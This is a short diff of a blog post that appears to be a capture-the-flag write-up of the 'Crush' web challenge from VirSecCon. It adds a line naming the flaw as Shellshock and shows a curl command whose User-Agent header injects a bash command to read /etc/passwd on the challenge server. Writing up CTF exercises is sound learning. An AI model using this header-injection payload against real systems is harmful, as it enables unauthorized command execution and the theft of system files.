yaserfaraj/yaserfaraj.github.io/_posts/2020-04-5-virseccon-web-challenges-ctf.md

 ### Crush : Web Challenge
-It was a hint in the website about this vulnerability, then found the `crush.sh` file
+It was a hint in the website about this vulnerability, then found the `crush.sh` file.
+It is seems to be a `shellshock exploit`

 ```sh
 curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://jh2i.com:50020/cgi-bin/crush.sh